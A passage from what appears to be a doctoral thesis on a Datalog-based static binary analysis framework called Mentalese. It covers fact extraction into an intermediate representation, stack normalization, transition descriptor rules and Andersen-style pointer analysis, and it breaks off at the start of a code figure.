The use/def term alone tells us that r3_4 is used, but not that it is used twice as an operand. To make this explicit, we introduce an ID for each operand per instruction. Combined with the basic block and order, we have a unique identifier for each operand. The slice_id term specifies whether the expression is a sliced expression (see Figure 2.7). A -1 indicates that the expression is not a sliced expression; otherwise, the ID of a Slice is given. Slices are extracted into a separate tab-separated file. Combined with the IL-Address, we have a unique identifier into that file to retrieve the expression that corresponds to the register. The last term, ctx, indicates the context of the register, that is, the function in which the register is defined or used. As the predicate signifies, the terms are either strings or integers. Soufflé is a statically typed language and supports four primitive types: integers, unsigned integers, strings, and floats. The engine also allows types to be subtyped and supports union types, which permit merging several types of the same primitive type. These features help to avoid bugs and common pitfalls due to name equivalences in the binding process. For simplicity, we restrict ourselves to integers and strings. Table 3.1 summarizes the important facts that we extract from the binary into the EDB. From the perspective of abstract interpretation, EDB facts are abstract properties. Note that we dismantle each SymIL statement into the EDB facts presented in the table, each of which is a property. It is up to the IDB rules to orchestrate the usage of these abstract properties and derive knowledge. We cover this concept in the next sections. Besides expressions, we also extract information about the stack pointer, the CFG, φ-expressions, and several aggregates. The first column of the table denotes the literal/predicate.
The second and third columns show the number of terms for each literal and what each term means once the fact gets instantiated. For almost every literal, the last three terms model the address (bb, order, ctx). This triple combines the IL-Address (Definition 5) with the context (the name of the function). Each literal with such a triple stands for information that is present at the address specified by (bb, order), where bb denotes the basic block address and order pinpoints the IL-Instruction in an IL-Block. To trace a flaw or an interesting insight derived by our analysis framework back to its origin, we need to translate the address of an IL instruction back to the address of the original assembly instruction. This is achieved through a mapping which we also extract into the EDB and which is listed as ILAddrToAddr in Table 3.1. Note that we use this form of addressing since each assembly instruction can map to several IL instructions. Furthermore, there are statements like φ-statements that are citizens of the IL-Block and occupy an IL-Address but have no assembly address attached to them. Besides φ-statements, which are part of the SSA translation, we also introduce new expressions into the IL-Blocks that help us simplify our Datalog algorithms. We cover each of these in the course of this thesis. Figure 3.1 illustrates how different EDB facts that are extracted from the binary and represent the same statement interplay. Each fact can be seen as an abstract element, i.e., an abstraction of the statement. Each instruction is dismantled into these elements, represented by the literals. Combining these elements yields back the statement. This gives us a flexible instrument to build analyzers. Finally, the instantiated EDB and IDB predicates form our knowledgebase, and its specific design is what we refer to as Mental-IR.
Starting with an initial, “mental” image of the program formed by the EDB predicates, each derived fact sharpens our image about the binary under analysis.
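Returning to the Register rows shown earlier, binding such fact rows to the predicate signature can be sketched as follows; the tuple layout follows the signature from the text, while the parsing code itself is only an illustration of ours:

```python
from collections import namedtuple

# Register(reg_id, ssa_name, def_use, is_slice, bb, order, ctx)
Register = namedtuple("Register", "reg_id ssa_name def_use is_slice bb order ctx")

rows = "13\tr3_4\td\t-1\t361700\t0\tsub_57DB4\n" \
       "17\tr0\tu\t-1\t361700\t0\tsub_57DB4"

facts = []
for line in rows.splitlines():
    reg_id, ssa, du, sl, bb, order, ctx = line.split("\t")
    facts.append(Register(int(reg_id), ssa, du, int(sl), int(bb), int(order), ctx))

# reg_id is unique per instruction, so (reg_id, bb, order) identifies an operand.
assert len({(f.reg_id, f.bb, f.order) for f in facts}) == len(facts)
print(facts[0])
```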

3.2 Overview

Our design of Mentalese is divided into two processing stages: a preprocessing stage handled by our frontend, and a postprocessing stage responsible for the analysis. The frontend receives a CFG specification in JSON and lifts each function of the binary into SymIL (see Figure 2.7), where we dismantle each statement of each lifted basic block into facts. The facts of interest are listed in Table 3.1; they are called EDB facts and form the initial state of a knowledgebase. This design of a knowledgebase is basically an IR that represents a binary program, which we refer to as Mental-IR. EDB facts build the base for the analysis procedures that are established through IDB rules. These algorithms are implemented in the backend of Mentalese, which comes with a set of libraries for pointer analysis, taint analysis, slicing, constant value propagation, and symbolic evaluation. This is mainly achieved by implementing inference systems out of Datalog rules which derive new facts. These facts, in turn,

Table 3.1: EDB facts that get extracted from a binary.

Register:
  t0       reg_id: Register ID
  t1       ssa_name: Register name in SSA form
  t2       def_use: t2 ∈ {"d", "u"}
  t3       slice_id: Slice ID
  t4, ..., t6   bb, order, ctx

Slice:
  t0       slice_id: Slice ID
  t1       type: t1 ∈ {"Reg", "Mem"}
  t2       type_id: register ID for Reg, memory ID for Mem
  t3       l-bit: Index of lower bound
  t4       h-bit: Index of higher bound
  t5, ..., t7   bb, order, ctx

CallTo:
  t0       callee: Function to be called
  t1       target: Target entry address
  t2       section: code section (.plt, .text, ...)
  t3, ..., t5   bb, order, ctx

Functions:
  t0       entry: Address of function entry
  t1       ctx: Function name

Memory:
  t0       mem_id: ID associated with a memory load/store event
  t1       deref_type: t1 ∈ {"load", "store"}
  t2       base_type: t2 ∈ {"Reg", "Cst"}; Cst stands for constant value
  t3       base_id: ID associated with the base
  t4       disp: displacement added to the base
  t5, ..., t7   bb, order, ctx

Constant:
  t0, t1   cst_id, cst: ID of a constant (t0) and constant value (t1)
  t2, ..., t4   bb, order, ctx

Phi:
  t0, ..., t2   bb, order, ctx: address of a φ-statement

Equation:
  t0       id: ID associated with an equation
  t1       operation: +, −, &, ...
  t2       operand1_type: t2 ∈ {"Reg", "Eqn", "Mem", "Cst"}
  t3       operand1_id: ID associated with the left-hand-side operand
  t4       operand2_type: right-hand-side operand type (analogous to t2)
  t5       operand2_id: ID associated with the right-hand-side operand
  t6, ..., t8   bb, order, ctx

Edges:
  t0, ..., t2   src, dst, ctx: Edge from source to destination in function ctx

StackInfoOffset:
  t0       stack_pointer: stack pointer in SSA form
  t1       disp: Displacement added to the stack pointer
  t2       delta: Stack pointer delta value (SPD)
  t3       ctx: Function context

Scope:
  t0       reg_name: Non-SSA-subscripted register
  t1       reg_ssa_name: Register name in SSA form
  t2       type_loc: t2 ∈ {"Call", "Leaf"}
  t3, ..., t5   bb, order, ctx

ILAddrToAddr:
  t0       addr: The real instruction address
  t1, ..., t3   bb, order, ctx

Equation(23, ==, Eqn, 24, Cst, 59, 70768, 0, j_realloc)
Equation(24, +, Reg, 51, Cst, 58, 70768, 0, j_realloc)
Register(51, rax_2, "u", -1, 70768, 0, j_realloc)
Register(52, zf_4, "d", -1, 70768, 0, j_realloc)
Constant(59, 0, 70768, 0, j_realloc)
Constant(58, 2, 70768, 0, j_realloc)

          ==
         /  \
       Eqn   Cst
        |     |
        +     0
       / \
    Reg   Cst
     |     |
   rax_2   2

Figure 3.1: Syntax tree of zf_4 ← rax_2 + 2 == 0 and the facts that represent it.

can be used as building blocks for other inference systems to derive a new set of facts. The derived facts are—as we discussed in the previous section—IDB facts, and they contribute to the knowledgebase. Thus, the IR is flexible, giving us the chance to sharpen the image, the “mental” representation of the program, with each new rule. Figure 3.2 illustrates the high-level architecture. As a user, we can interact with the IR and the libraries not only in Datalog but also through exposed API interfaces, which currently target C and, partially, Rust and Python. This allows us to write queries and probe for interesting properties as well as contribute to the IR. A human user as well as a dynamic analyzer can contribute facts to the IR, bringing insights into the analyses that help them perform better. One of our requirements is to make this process transparent, such that each analysis picks up the new information as if it had been there from the beginning. Again, the way Mentalese is built, with its backend based on Datalog, allows us to achieve this requirement. Chapters 4 and 5 give details about new tools that are built on top of Mentalese.

[Figure 3.2 shows the high-level architecture: a Binary File is processed by the Frontend, which obtains a CFG from third-party tools (IDA Pro/Binary Ninja) and lifts the code to SymIL via Amoco; facts are extracted into the Mental-IR, on which the Backend's analysis libraries operate and contribute derived facts.]

Figure 3.2: High-level architecture of Mentalese.

3.3 Frontend

The frontend of Mentalese processes the binary and produces the EDB. To do so, it needs a CFG specification, as we do not perform CFG reconstruction ourselves. The CFG specification is a single JSON file that contains the function entry addresses, the function names (if available), and the basic block boundaries associated with each function. This allows for using well-established off-the-shelf tools, such as IDA Pro, Binary Ninja, or Ghidra, for the CFG reconstruction. By processing the CFG specification, each function gets lifted to our customized IL, which is done basic-block-wise using the Amoco framework. Each IL block is transformed to SSA form, which in turn is translated into EDB facts and written to the knowledgebase. Figure 3.3 shows the lifting of an x86-64 basic block into SymIL in SSA form. The preprocessing step performs the following tasks:

1. Lifting into SymIL.

2. Stack normalization.

3. Instrumentation: adds meta-registers to SymIL.

4. Transfer of SymIL into Mental-IR.

———————0x41fa89———————-
0x41fa89 mov edx, [rbp-4]
0x41fa8c mov rax, qword ptr [rbp-16]
0x41fa90 add rax, rdx
0x41fa93 cmp qword ptr [rbp-48], rax
0x41fa97 ja 0x41fa64

Lift

———————0x41fa89———————-
rdx_2 ← M32(rsp_0-4)[0:31] <+> 0[31:63]
rax_15 ← M64(rsp_0-16)
rax_16 ← rax_15+rdx_2
zf_4 ← ((M64(rsp_0-48)-rax_16)==0x0)
next_5 ← ((cf_4==0x0)∧(zf_4==0x0)) ? 0x41fa64 : 0x41fa99

Figure 3.3: x86-64 lifting.

3.3.1 Stack Normalization

On Intel x86 and many other instruction set architectures, the stack pointer is used to keep a reference to the top of the stack. The stack is usually accessed in relation to the current stack pointer. On Intel x86, the frame pointer is additionally linked to the stack pointer and keeps a reference to the beginning of the current stack frame. The frame pointer is usually used to access local variables on the stack. However, it is possible to omit this functionality of the frame pointer, giving us an additional general-purpose register. This common optimization strategy, also called frame-pointer omission, means that local variables are accessed through the stack pointer only. To uniformly access stack variables, we need a uniform arrangement of how we look at the stack. For this purpose, we normalize the stack and enforce each access to go through the stack pointer. This is achieved by rebasing all stack accesses to be relative to the stack pointer. Figure 3.4b illustrates this concept. The labels become clear on closer inspection of how a function's prologue in x86 is lifted to SymIL:

push rbp      | rsp_0 ← rsp - 8
              | M64(rsp_0) ← rbp
mov rbp, rsp  | rbp_0 ← rsp_0
sub rsp, 0x20 | rsp_1 ← rsp_0 - 0x20

On the left side we see a standard prologue, on the right side the lifted instructions in SymIL. Each stack access with respect to rbp is now performed through rsp_0.

In a normalized stack, we refer to the initial stack pointer as the pointer that points to the location before any stack operation is performed, i.e., before the stack frame is set up by the function's prologue. In our example the initial stack pointer is rsp without any SSA subscript. To avoid architecture specifics, we denote the initial stack pointer as sp. Figure 3.4a shows the arrangement for a normalized stack on x86 architectures. On ARMv7 and AArch64 architectures, we have the same arrangement, except that the return address is not stored on the stack. On the left side of each cell, delta values are denoted with respect to sp. We refer to these delta values as stack pointer deltas (SPD), which we use to model stack addresses. Each delta value can be used to reference a memory cell. For instance, the address of var_x in Figure 3.4 can be modelled by the tuple (−16, 0), i.e., the delta value of the variable plus some optional field which depends on the access footprint. The SPD values give us a flexible instrument to model arbitrary stack accesses.

As a motivation, let's assume that we have a pointer to the cell of var_x and want to access the cell above it. In x86-64 assembly, we might see code with the following pattern:

mov rax, [rbp - 8]  ; sp - 16
mov rbx, [rax + 8]

Such an access is described by (−16, 8), which is the address of the cell adjacent to var_x. As we see in the next sections, we use these SPD values in our pointer analysis to model points-to relations with respect to stack locations.

Definition 6. Let S be the set of all stack variables. Each s ∈ S is a tuple of the form (spd_s, fld_s) where spd_s is the stack pointer delta of s and fld_s an optional field value added to the initial stack pointer.
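Definition 6 can be mirrored directly in code; a tiny sketch of ours, where resolve gives the delta of the accessed cell relative to the initial sp (the concrete numbers reuse the var_x example above):

```python
def resolve(spd, fld):
    """Delta of the accessed stack cell relative to the initial sp."""
    return spd + fld

var_x = (-16, 0)     # mov rax, [rbp - 8]   ; the cell at sp - 16
adjacent = (-16, 8)  # mov rbx, [rax + 8]   ; the cell above var_x

print(resolve(*var_x), resolve(*adjacent))
```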

In Table 3.1 we listed StackInfoOffset, a predicate related to the SPD values. Applied to our example, we get:

rsp_0 ← rsp - 8      | StackInfoOffset(rsp_0, 0, -8, fA).
M64(rsp_0) ← rbp     |
rbp_0 ← rsp_0        |
rsp_1 ← rsp_0 - 0x20 | StackInfoOffset(rsp_0, -0x20, -0x28, fA).

The third term in the predicate is the calculated SPD value. The instantiated fact,
StackInfoOffset(rsp_0, -0x20, -0x28, fA), is semantically equivalent to:

rsp_0 - 0x20 = rsp - 0x28

This gives us an alias with respect to the initial stack pointer. Any stack access with the same SPD value is an alias. We compute the SPD values by performing a reaching definition analysis on the stack pointer. We determine each stack access in SymIL and compute its offset with respect to the initial stack pointer and the delta value. Each stack access is then transformed into a StackInfoOffset fact.
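The SPD bookkeeping behind these facts reduces to constant folding along the stack-pointer definitions; a minimal sketch of ours reproducing the two facts above (fA names the function context):

```python
# Delta of each SSA stack-pointer version relative to the initial sp.
delta = {"rsp": 0}
delta["rsp_0"] = delta["rsp"] - 8       # rsp_0 <- rsp - 8
delta["rsp_1"] = delta["rsp_0"] - 0x20  # rsp_1 <- rsp_0 - 0x20

def stack_info_offset(sp, disp, ctx="fA"):
    """StackInfoOffset(stack_pointer, disp, delta, ctx): sp + disp = initial sp + delta."""
    return (sp, disp, delta[sp] + disp, ctx)

print(stack_info_offset("rsp_0", -0x20))
```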

[Figure 3.4 depicts the normalized stack: deltas relative to sp label each cell (return address at +8, sp at 0, old rbp at −8, var_x at −16); in (b) rsp_0 and rsp_1 are additionally rebased onto these cells.]

Figure 3.4: Normalized stack for the x86 architecture: a) The stack arrangement for a normalized stack. The initial stack pointer (sp) is not touched by the function's prologue. b) The rebased arrangement for a normalized stack.

3.3.2 SymIL Extensions

To cope with branch conditions and ease interprocedural analyses, we extend our IL by the following pseudo-registers:

• next

• f_ret_*

The next register holds the address of the next intra-procedural basic block. In Figure 3.3 we see how the register is defined for a branch condition; other cases to account for are 1) an unconditional jump, 2) a call, or 3) no jump at all. In the first and trivial case the next register holds the target address of the jump; in the latter two cases the register holds the fall-through address. The next register is particularly useful if we need to take branch conditions into account. In Figure 3.3 we can see that the condition depends on zf_4 and cf_4, which in turn depend on M64(rsp_0-48) and rax_16. For a taint analysis it becomes useful as we can track the branches that we control; for a slicer it becomes useful as we

need to take control dependencies into account, where we have to follow expressions that occur in the conditions of the branching blocks. The f_ret_* register is a pseudo-register that represents the return value. We use it to mimic a call and define the so-called return-receiver, which is the register that holds the return value according to the ABI. For x86 it is rax/eax; for ARMv7 it is r0. The * symbol is a wildcard for the name of the called function. For instance, if we call a function A, then we get a pseudo-register f_ret_A placed at the end of the IL-Block, which defines the return-receiver. Figure 3.6 shows the concept by example. The sample in the figure is taken from libssh2, compiled with O0 optimizations for x86-64 and ARM, respectively. This brings us as close as it gets to the source code. We can see the similarity between the blocks illustrated for both architectures: the access patterns are the same, leading to the same behavior for the function call, and even the number of instructions is equal.

3.3.3 Scopes

In Section 2.3.2 we introduced the notion of Collectors, which are computed at lines 55-58 in Figure 2.11. These Collectors are snapshots of live register definitions at the time of a call and at the end of a leaf node. Collectors are incorporated as Scope facts into Mental-IR. The specification of these facts is listed in Table 3.1. By using the concept of Collectors during the SSA translation, we avoid the algorithmic computation of liveness. While this costs us some storage, it has the benefit of a simple lookup and immensely eases our algorithms. As we only write out the facts for calling nodes and leaf nodes, the storage space is manageable and much lower than for the Register facts. As an example, consider the basic block shown in Figure 3.6 which calls libssh2_list_add, and assume a scenario of a tainted parameter or a pointer which is to be tracked in the context of the callee. The corresponding Scope facts are listed in Figure 3.5a. The entry node of the x86-64 version of the call target in SymIL is shown in Figure 3.5b, where we highlighted the uses of rdi and rsi. These registers are not in SSA form, which indicates that they might be parameters. In fact, following the AMD64 ABI for x86-64, the first parameter is stored in the rdi register. According to our Scope facts, the SSA version of this register at the callsite is rdi_82. Now we can map rdi_82 to the use of rdi in the call target. If rdi_82 gets tainted, then (rsp_0 - 8) gets tainted in the callee context. Scopes are not only valuable at callsites; at leaf nodes they are valuable to follow tracks into return receivers or can be used to map register definitions between callee and caller.

r4 r4_3 Call 77828 21 _libssh2_packet_add
r7 r7_0 Call 77828 21 _libssh2_packet_add
lr lr_22 Call 77828 21 _libssh2_packet_add
sp sp_152 Call 77828 21 _libssh2_packet_add
r0 r0_105 Call 77828 21 _libssh2_packet_add
r1 r1_63 Call 77828 21 _libssh2_packet_add
r2 r2_105 Call 77828 21 _libssh2_packet_add
r3 r3_321 Call 77828 21 _libssh2_packet_add
next next_151 Call 77828 21 _libssh2_packet_add

rsp rsp_182 Call 123361 23 _libssh2_packet_add
rbp rbp_0 Call 123361 23 _libssh2_packet_add
cf cf_138 Call 123361 23 _libssh2_packet_add
zf zf_138 Call 123361 23 _libssh2_packet_add
rdi rdi_82 Call 123361 23 _libssh2_packet_add
rsi rsi_61 Call 123361 23 _libssh2_packet_add
rdx rdx_106 Call 123361 23 _libssh2_packet_add
rcx rcx_33 Call 123361 23 _libssh2_packet_add
rax rax_363 Call 123361 23 _libssh2_packet_add
next next_177 Call 123361 23 _libssh2_packet_add
r8 r8_3 Call 123361 23 _libssh2_packet_add

(a)

rsp_0 ← (rsp-0x8)
(rsp_0) ← rbp
rbp_0 ← rsp_0
(rsp_0-8) ← rdi
(rsp_0-16) ← rsi
rax_0 ← M64(rsp_0-16)
rdx_0 ← M64(rsp_0-8)
(rax_0+16) ← rdx_0
rax_1 ← M64(rsp_0-16)
(rax_1) ← 0x0
rax_2 ← M64(rsp_0-8)
rdx_1 ← M64(rax_2)
rax_3 ← M64(rsp_0-16)
(rax_3+8) ← rdx_1
rax_4 ← M64(rsp_0-8)
rdx_2 ← M64(rsp_0-16)
(rax_4) ← rdx_2
rax_5 ← M64(rsp_0-16)
rax_6 ← M64(rax_5+8)
zf_0 ← (rax_6==0x0)
next_0 ← ((zf_0==0x1) ? 0x1c2c4 : 0x1c2b3)

(b)

Figure 3.5: Scopes: a) live definitions at the callsites to libssh2_list_add. b) Entry node of libssh2_list_add.

[Figure 3.6 lists the basic block calling libssh2_list_add in x86-64 and ARMv7 Thumbv2 assembly on the left side with the corresponding SymIL on the right side, each ending in the pseudo-register f_ret__libssh2_list_add that defines the return-receiver.]

Figure 3.6: x86-64 and ARMv7 Thumbv2 assembly on the left side; corresponding SymIL on the right side.

3.4 Backend

Once the binary is translated into SymIL and transformed into Mental-IR, we have established the base for the analysis of the underlying program. The backend implements an initial set of analyses that form an extensible library operating on the IR. It exposes an API to spawn analysis procedures and can put a human into the loop to add knowledge to the IR. The IR initially consists of EDB facts and grows with each new fact derived by the rule set. Each fact is an abstract element; facts represent properties of interest for each instruction. The backend implements transition descriptors, which use a basic set of EDB facts to derive a higher level of abstraction describing how information flows from one statement to another. Each EDB fact gives a partial image, a small detail of what goes on in a statement, and the descriptor rules aggregate these properties to sharpen the image of the information flow. Analyses can build on these descriptors. In the next sections we describe how this concept is achieved.

3.4.1 Transition Descriptors

For our analysis procedures we need a basic rule set that reasons about events. Such events are, for instance, a register-to-register assignment or a register-to-memory store, basically any event that causes an information flow and a state transition. By state, we refer to L × M, where L is the set of all program labels (addresses) and M the set of machine states (register and memory states).

Table 3.2: Transition events.

Event                  SymIL-Stmt    Descriptor-Rule
Register to Register   reg ← reg     chain_rr
Register to Memory     Mem ← reg     chain_rm
Memory to Register     reg ← Mem     chain_mr
Constant to Register   reg ← cst     chain_cr
Constant to Memory     Mem ← cst     chain_cm
Equation to Register   reg ← BinOp   chain_eqrr | chain_eqmr
Equation to Memory     Mem ← BinOp   chain_eqrm

Table 3.2 shows the statements that match the events according to the SymIL grammar as specified in Figure 2.7. The third column denotes the IDB predicate to be deduced for each event. For the equation-to-register and equation-to-memory events we define three rules, each of which specifies a specific BinOp pattern:

chain_eqrr : reg ← reg op reg
chain_eqmr : reg ← [reg op reg + disp]
chain_eqrm : [reg+disp] ← [reg + disp] op reg

Note that the third rule is x86-specific, as x86 allows direct arithmetic with memory operands. The operator is denoted by op. Binary operation events involving constants are not presented but are implemented in a similar fashion. The following IDB rule shows the rule for a register-to-register move:

1 chain_rr(reg1, reg2, bb, order, ctx) :-
2     Register(_, reg1, "u", _, bb, order, ctx),
3     Register(_, reg2, "d", _, bb, order, ctx),
4     !Memory(_, _, _, _, _, bb, order, ctx),
5     !Phi(bb, order, ctx),
6     !Equation(_, _, _, _, _, _, bb, order, ctx).

The first line is the header; lines 2-6 form the body of the rule. For the definition of each literal, please refer to Table 3.1. Lines 2-3 query for register uses and definitions at the same IL-address (see Definition 5). The remaining literals constrain the type of the movement, i.e., each line excludes events that would violate the register to register move property. At line 4 we rule out memory accesses, at line 5 we further restrict the query to exclude phi statements, and finally at line 6 we require that no arithmetic operation occurs at the same IL-address. With these restrictions, we enforce a register to register move where each instantiated register use represented by reg1 is moved to the defined register represented by reg2. The rule now represents each SymIL statement of the form reg2 ← reg1. We call it a Transition Descriptor as it describes how a state transition is performed through the statement that matches the descriptor rule. These descriptors are embedded in transitional semantics with respect to the underlying abstraction and analysis. For instance, if we know that a register r1 points to a stack location and is moved to register r2, then r2 also points to that location. Figure 3.7 shows the Datalog implementation of the descriptors for each transition event and conveys the idea of how we define transition descriptors. For equation-to events we only show the implementation of the chain_eqrr rule, as the patterns to build the others are similar. Transition descriptors are the core building blocks from which analysis procedures are written in Mentalese; the next section clarifies this in more detail. Note that the notion of a chain is not to be confused with its mathematical definition, which is tied to total orders. We use the term in a metaphoric sense, as each descriptor links expressions and thereby builds a chain of such events.
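To make the join semantics of such a descriptor rule tangible, the following Python sketch mimics the chain_rr derivation over a hand-made fact base. This is a didactic toy, not Mentalese code; all registers, addresses, and facts are invented for illustration.

```python
# Toy fact base mirroring the EDB relations of Table 3.1.
# Register facts: (id, reg, mode, size, bb, order, ctx)
registers = [
    (0, "rbx_2", "u", 64, 0x1000, 1, "main"),  # use at IL-address (0x1000, 1)
    (1, "rax_3", "d", 64, 0x1000, 1, "main"),  # definition at the same address
    (2, "rcx_1", "u", 64, 0x1000, 2, "main"),  # statement 2 is a store ...
    (3, "rdx_4", "d", 64, 0x1000, 2, "main"),  # ... and must not match
]
# IL-addresses carrying facts of the negated relations.
memory_sites   = {(0x1000, 2, "main")}
phi_sites      = set()
equation_sites = set()

def chain_rr():
    """Derive chain_rr(reg1, reg2, bb, order, ctx): pure reg-to-reg moves."""
    derived = set()
    for (_, reg1, mode1, _, bb, order, ctx) in registers:
        if mode1 != "u":
            continue
        for (_, reg2, mode2, _, bb2, order2, ctx2) in registers:
            if mode2 != "d" or (bb, order, ctx) != (bb2, order2, ctx2):
                continue  # use and definition must share one IL-address
            # The negated literals: no memory access, phi, or equation here.
            if (bb, order, ctx) in memory_sites | phi_sites | equation_sites:
                continue
            derived.add((reg1, reg2, bb, order, ctx))
    return derived

print(chain_rr())  # only statement 1 qualifies: rbx_2 -> rax_3
```

Statement 2 carries a Memory fact at its IL-address and is filtered out by the negated literal, exactly as in the Datalog rule above.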

reg2 ← reg1

chain_rr(reg1, reg2, bb, order, ctx) :-
    Register(_, reg1, "u", _, bb, order, ctx),
    Register(_, reg2, "d", _, bb, order, ctx),
    !Memory(_, _, _, _, _, bb, order, ctx),
    !Phi(bb, order, ctx),
    !Equation(_, _, _, _, _, _, bb, order, ctx).

Msize(base+disp) ← reg

chain_rm(reg, base, disp, bb, order, ctx) :-
    Memory(_, "store", _, base_id, disp, bb, order, ctx),
    Register(base_id, base, "d", _, bb, order, ctx),
    Register(_, reg, "u", _, bb, order, ctx),
    !Equation(_, _, _, _, _, _, bb, order, ctx).

reg ← Msize(base+disp)

chain_mr(base, disp, reg, bb, order, ctx) :-
    Memory(_, "load", _, base_id, disp, bb, order, ctx),
    Register(base_id, base, "u", _, bb, order, ctx),
    Register(_, reg, "d", _, bb, order, ctx),
    !Equation(_, _, _, _, _, _, bb, order, ctx).

reg1 ← cst

chain_cr(cst, reg1, bb, order, ctx) :-
    Constant(_, cst, bb, order, ctx),
    Register(id_reg1, reg1, "d", _, bb, order, ctx),
    !Register(_, _, "u", _, bb, order, ctx),
    !Equation(_, _, _, _, "Cst", _, bb, order, ctx),
    !Memory(_, _, _, _, _, bb, order, ctx).

Msize(base+disp) ← cst

chain_cm(cst, base, disp, bb, order, ctx) :-
    Constant(_, cst, bb, order, ctx),
    !Equation(_, _, _, _, _, _, bb, order, ctx),
    Memory(_, "store", _, base_id, disp, bb, order, ctx),
    Register(base_id, base, "d", _, bb, order, ctx).

reg_def ← reg1 op reg2

chain_eqrr(reg_def, reg1, op, reg2, bb, order, ctx) :-
    Equation(_, op, "Reg", id1, "Reg", id2, bb, order, ctx),
    Register(id1, reg1, "u", _, bb, order, ctx),
    Register(id2, reg2, "u", _, bb, order, ctx),
    Register(_, reg_def, "d", _, bb, order, ctx),
    !Memory(_, "store", _, _, _, bb, order, ctx).

Figure 3.7: Transition Descriptors.

3.4.2 Pointer Analysis

For a language with pointers and dynamic memory allocation, a pointer analysis tackles the problem of determining what a pointer variable may target. The applications of pointer analysis are manifold; it provides the foundation and building blocks for other analyses, not only in the security field. Intuitively, its application boils down to detecting unsafe dereferences, such as null pointer dereferences, dangling pointers, or uninitialized uses. Compilers use it to optimize the pipeline utilization of modern CPUs. Pointer analyses also enhance the understanding of a program and can therefore be seen as a building block. Taint analysis, as we will see, can gain a precision boost by combining it with pointer analysis. Due to work by Ramalingam [162], we know that a sound and complete pointer analysis is undecidable. A common abstraction in static analysis to cope with pointers are Points-To relations; therefore, pointer analysis and Points-To analysis are often used interchangeably. In the research literature it is referred to as a specific class of analyses to model dynamic memory allocations, which also correlates with the fact that most of the work in this field targets Java. Pearce et al. [156] discuss the differences and obstacles that the C language brings into the analysis and propose a field-sensitive technique for C programs. A more recent work by Balatsouras and Smaragdakis [16] proposes a structure-sensitive technique for C/C++ programs which operates on LLVM bitcode and brings type information into the analysis to improve precision. A notion that is closely related to Points-To analysis is alias analysis. Alias analysis and Points-To analysis are two types of pointer analyses; the difference is the query we ask, i.e., for alias analysis we are interested in pairs of pointers which point to the same location, whereas for a Points-To analysis we want the targets a pointer might point to.
Pointer analyses come in different flavors which concern the flow, context, and field sensitivity of the analysis process. A context-sensitive approach can distinguish between different function invocations. A flow-sensitive analysis considers the order of executed instructions, i.e., it respects the control flow and typically computes a solution for each program point. A flow-insensitive analysis, in contrast, computes one solution per method or per whole program, merging information from all program points. With field sensitivity, we gain further information about different fields that are referenced through a common base pointer and its displacement. Our analysis approach utilizes an inclusion-based (Andersen-style) points-to analysis [7]. Here, SSA is crucial as it implicitly enables partial flow sensitivity [97].
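The difference between the flow-sensitive and flow-insensitive views can be illustrated with a small Python toy; this is not Mentalese code, and the variable names are invented:

```python
# Toy program: two address-of assignments to the same pointer, in order.
program = [("p", "a"), ("p", "b")]

# Flow-insensitive: one merged solution for the whole program.
insensitive = {}
for var, target in program:
    insensitive.setdefault(var, set()).add(target)

# Flow-sensitive: one solution per program point; the later assignment
# performs a strong update that kills the earlier target.
sensitive = []
state = {}
for var, target in program:
    state = dict(state)
    state[var] = {target}
    sensitive.append(state)

print(insensitive["p"])     # merged: both a and b
print(sensitive[-1]["p"])   # at the last program point: only b
```

The flow-insensitive solution reports that p may point to a or b anywhere in the program, while the flow-sensitive one knows that after the second assignment only b remains.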

Andersen’s Pointer Analysis

When it comes to pointer analysis, two techniques stand out: Andersen [7] and Steensgaard. Both techniques are insensitive to flow, context, and field. Steensgaard's algorithm was developed to handle large code bases: it runs linear in space and almost linear in time. A more accurate, yet slower method with an asymptotic worst-case performance of O(n³) is Andersen's algorithm; in practice, however, Andersen has been shown to run in O(n²). Each algorithm runs over the program and transforms the statements into constraints. As we use an Andersen-style technique for our binary points-to analysis, we clarify the concepts for a better understanding of how we implement it in Datalog. We list a simple set of rules to define the following inference system:

Address-Of:          x = &y    ⟹    pts(x) ⊇ {l_y}
Assign:              x = y     ⟹    pts(x) ⊇ pts(y)
Dereference read:    x = *y    ⟹    pts(x) ⊇ pts(*y)
Dereference write:   *x = y    ⟹    pts(*x) ⊇ pts(y)

Variables x and y are constraint variables. Each rule is read left to right: the left-hand side is the code to match, the right-hand side the action that is taken. For instance, the Address-Of rule says that if we match a statement like x = &y, then the address of y (location l_y) is taken and joined with the points-to set of x. The expression pts(x) ⊇ pts(y) states that each address in the points-to set of y is also pointed to by x; we can see why the technique is called inclusion-based. Each line of code is matched against the rules, yielding a set of constraints induced by the actions of the rules. Applying Andersen's algorithm gives us a directed graph where we draw a normal edge from x to y for each address taken and an inclusion edge for each pts(x) ⊇ pts(y) relation. We specify these relations as follows:

• Assign: pts(x) ⊇ pts(y) (trivial case)

• Dereference read: ∀α ∈ pts(y) ⟹ pts(x) ⊇ pts(α)

• Dereference write: ∀α ∈ pts(x) ⟹ pts(α) ⊇ pts(y)

Figure 3.8 shows a C program and its corresponding points-to graph. Line 9 is transformed into lines 10-11 to match our rules. Black edges carry address-taken information, blue edges are inclusion edges, and red edges model information that is propagated through an inclusion edge. For instance, since the points-to set of t collapses into the points-to set of x, each pointee of t becomes a pointee of x; this is indicated by the red edge from x to y1.
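The inference rules above can be turned into a naive fixpoint solver in a few lines. The following Python sketch, a didactic toy rather than Mentalese code, encodes the constraints of the program in Figure 3.8 and saturates the points-to sets:

```python
# Constraints for the program of Figure 3.8, with *a = *b already split
# into t = *b; *a = t as in lines 10-11 of the figure.
from collections import defaultdict

addr_of     = [("x", "x1"), ("y", "y1"), ("a", "x"), ("b", "y")]  # p = &v
copies      = []                                                  # p = q
deref_read  = [("t", "b")]                                        # p = *q
deref_write = [("a", "t")]                                        # *p = q

pts = defaultdict(set)
for p, v in addr_of:                 # Address-Of: pts(p) ⊇ {l_v}
    pts[p].add(v)

def include(dst, srcset):
    """pts(dst) ⊇ srcset; report whether anything new was added."""
    before = len(pts[dst])
    pts[dst] |= srcset
    return len(pts[dst]) != before

changed = True
while changed:                       # iterate until the system saturates
    changed = False
    for p, q in copies:              # Assign: pts(p) ⊇ pts(q)
        changed |= include(p, pts[q])
    for p, q in deref_read:          # ∀α ∈ pts(q): pts(p) ⊇ pts(α)
        for a in list(pts[q]):
            changed |= include(p, pts[a])
    for p, q in deref_write:         # ∀α ∈ pts(p): pts(α) ⊇ pts(q)
        for a in list(pts[p]):
            changed |= include(a, pts[q])

print(pts["x"])   # x picks up y1 through the inclusion edge, as in the figure
```

The result matches the points-to graph of Figure 3.8: t receives y1 via the dereference read, and the dereference write through a propagates y1 into the points-to set of x.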

 1 void main() {
